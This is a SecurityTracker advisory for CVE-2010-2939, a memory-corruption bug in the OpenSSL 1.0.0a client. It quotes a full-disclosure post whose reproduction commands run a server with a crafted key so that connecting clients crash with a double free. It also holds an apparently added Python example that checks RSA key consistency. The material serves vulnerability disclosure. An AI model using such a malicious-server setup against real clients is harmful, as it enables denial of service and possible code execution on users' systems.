SecurityTracker.com
Category:   Application (VPN)  >   OpenSSL
Vendors:   OpenSSL.org
OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1024296
SecurityTracker URL:  http://securitytracker.com/id/1024296
CVE Reference:   CVE-2010-2939
Updated:  Aug 20 2010
Original Entry Date:  Aug 9 2010
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.0a; possibly other versions
Description:   A vulnerability was reported in OpenSSL. A remote user can cause denial of service conditions and may be able to execute arbitrary code on the target user's system.

A remote server can return specially crafted data to a connected client to trigger a memory corruption error and cause the target client to crash or potentially execute arbitrary code.

Georgi Guninski reported this vulnerability.

Impact:   A remote user can cause denial of service conditions.

A remote user may be able to execute arbitrary code on the target user's system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.openssl.org/
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 29 2010 (NetBSD Issues Fix) OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service
NetBSD has issued a fix.
Nov 29 2010 (FreeBSD Issues Fix) OpenSSL Key Exchange Memory Corruption Error Lets Remote Users Deny Service   (FreeBSD Security Advisories <security-advisories@freebsd.org>)
FreeBSD has issued a fix for FreeBSD 7.1, 7.3, 8.0, and 8.1.



 Source Message Contents

Date:  Sat, 7 Aug 2010 14:07:30 +0300
Subject:  [Full-disclosure] openssl-1.0.0a


openssl-1.0.0a on ubuntu, debian and arch.

attached a private(lol) key and a cert.

~/local/bin/openssl s_server -www -accept 8888 -cert /tmp/CA.cert  -key /tmp/CA.key

~/local/bin/openssl s_client -connect localhost:8888

depth=0 CN = CA
verify return:1
*** glibc detected *** /home/build/local/bin/openssl: double free or corruption (fasttop): 0x0000000000979300 ***

~/local/bin/openssl rsa -check -in /tmp/CA.key |more
writing RSA key
RSA key error: q not prime # definitely


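The final command in the post above has `openssl rsa -check` report `q not prime` for the supplied key. The sketch below is an added example, not code from the post or from OpenSSL, showing the kind of consistency check that flags such a key before it is deployed; the toy key values are constructed, and the error strings other than `q not prime` are this example's own.

```python
import math
import random

def is_probable_prime(n, rounds=40):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:          # write n - 1 as d * 2^s with d odd
        d //= 2
        s += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False       # a is a witness that n is composite
    return True

def check_rsa_key(n, e, d, p, q):
    """Return a list of consistency errors; an empty list means no error found."""
    errors = []
    if not is_probable_prime(p):
        errors.append("p not prime")
    if not is_probable_prime(q):
        errors.append("q not prime")
    if p * q != n:
        errors.append("n does not equal p q")
    if p > 1 and q > 1:        # d*e must be 1 modulo lcm(p-1, q-1)
        lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
        if (d * e) % lam != 1:
            errors.append("d e not congruent to 1")
    return errors

# Constructed toy values, far too small for real use; not the key from the post.
GOOD_KEY = dict(n=3233, e=17, d=413, p=61, q=53)
BAD_KEY = dict(n=3111, e=17, d=53, p=61, q=51)    # q = 3 * 17 is composite

if __name__ == "__main__":
    for name, key in (("good", GOOD_KEY), ("bad", BAD_KEY)):
        print(name, check_rsa_key(**key) or "RSA key ok")
```
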
Copyright 2014, SecurityGlobal.net LLC